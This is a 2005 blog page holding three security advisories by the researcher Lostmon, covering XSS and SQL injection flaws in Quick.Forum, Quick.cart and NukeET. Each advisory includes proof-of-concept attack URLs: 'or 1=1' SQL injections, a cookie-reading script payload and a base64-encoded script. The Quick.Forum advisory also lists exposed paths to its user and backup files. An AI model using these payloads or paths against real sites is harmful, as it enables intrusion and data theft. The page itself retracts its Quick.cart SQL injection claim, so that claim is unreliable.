Quick.Forum 'topic field' XSS and 'page' & 'iCategory' SQL injection

Tuesday, May 10, 2005
#######################################################
Quick.Forum 'topic field' XSS and 'page' & 'iCategory' SQL injection
vendor url:http://qc.dotgeek.org/os/index.php
advisore:http://lostmon.blogspot.com/2005/05/
quickforum-topic-field-xss-and-page.html
vendor notify: yes exploit available: yes
OSVDB ID:16326, 16327, 16328 , 16329
Secunia: SA15200
BID:13602
######################################################

Quick.Forum contais a flaw which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Input passed to the "topic" field in "index.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML, script code and in a user's browser session in context of a vulnerable site.

Input passed to the "iCategory" and "page" variables in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


########
versions
########

2.1.6 afected

It is posible to prior versions are vulnerable too.

#############
solution
#############

no solution available at this time

#########
timeline
#########

discovered:28 april 2005
vendor notify: 10 may 2005 (webform)
vendor response:
vendor fix:
disclosure:11 mayo 2005

##################
proof of comcepts
##################
###############
SQL injections
###############

http://[victim]/forum/index.php?p=&iCategory=3%20or%201=1

http://[victim]/forum/index.php?p=topicsList&page=4%20or%201=1

http://[victim]/forum/?p=&iCategory=2%20or%201=1

########
XSS
########

http://[victim]/forum/?p=newTopic // topic field are vulnerable to XSS


################
some information
################

non important information , not need password to post

http://[victim]/forum/db/users.txt //show all users of forum.

http://[victim]/forum/db/banList.txt //list of all IP banned

http://[victim]/forum/db/censureWords.txt //all censured words

the backup of the database are stored in
http://[victim]/forum/backup/qf20050509.tar.bz2
and the file have the same name of the date was made the backup,
it can download directly ,but need to know the name of the file :P


###################### End ################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick.cart 'sWord' variable XSS and 'iCategory' SQL injection

####################
UPDATED 19-07-2005
####################

THIS ADVISORY IS INCORRECT , Quick.cart DON´T HAVE ANY
SQL DATABASE = NO SQL QUERIES = NO SQL INJECTION.

AND THE XSS FLAW ARE SOLVED IN Quick.Cart v0.3.1

OSVDB ID:16331

########################################################



#########################################################
Quick.cart 'sWord' variable XSS and 'iCategory' SQL injection
vendor url:http://qc.dotgeek.org/os/index.php
advisore:http://lostmon.blogspot.com/2005/05/
quickcart-sword-variable-xss-and.html
vendor notify: yes exploit available: yes
OSVDB ID: 16330 and 16331
Secunia: SA15297
BID:13599
##########################################################

Quick.cart contais a flaw which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Input passed to the "sWord" variable in "index.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML, script code and in a user's browser session in context of a vulnerable site.

Input passed to the "iCategory" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code



########
versions
########

0.3.0 afected


#############
solution
#############

no solution available at this time

#########
timeline
#########

discovered:28 april 2005
vendor notify: 10 may 2005 (webform)
vendor response:
vendor fix:
disclosure: 11 may 2005

##################
proof of comcepts
##################
#####################
Cross site scripting
#####################

http://[victim]/?p=productsList&sWord=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/index.php?p=productsList&sWord=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

##############
sql injection:
##############

http://[victim]/?p=productsList&
iCategory=7%20or%201=1

http://[victim]/index.php?p=productsList&
iCategory=7%20or%201=1


############### End #####################


thnx to estrella to be my ligth
Thnx to icaro He is my Shadow ;P
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

NukeET 'codigo' variable cross site scripting

################################################
NukeET 'codigo' variable cross site scripting
vendor url:http://www.truzone.org
advisore:http://lostmon.blogspot.com/2005/05/
nukeet-codigo-variable-cross-site.html
Vendor confirmed : yes exploit available: yes
OSVDB ID:16214
Secunia:15332
BID:13570
Securitytracker:1013936
#################################################

NukeET Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'codigo' variable upon submission to the 'security.php'scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.

bug found by Suko , investigate and reporter by Lostmon.

##########
versions
##########

prior to 3.2 afected

##########
solution:
##########

vendor patch

http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77

###########
timeline
###########

discovered: 9 may 2005
vendor notify: 9 may 2005
vendor response : 10 may 2005
vendor fix: 10 may 2005
disclosure: 10 may 2005


##########
exploit:
##########

'codigo' variable acepts base64 url encode ,
if we encode for example:

<script>alert()</script><h1>XSS PoW@ !!!</h1>

in base64 this is:

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+

if we aded this base64 code the alert and de tag h1
is executed with any problem.
http://[victim]/security.php?codigo=
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+


################ End ##################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to Suko "la paciencia es una virtud pekeƱo Jedy"

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...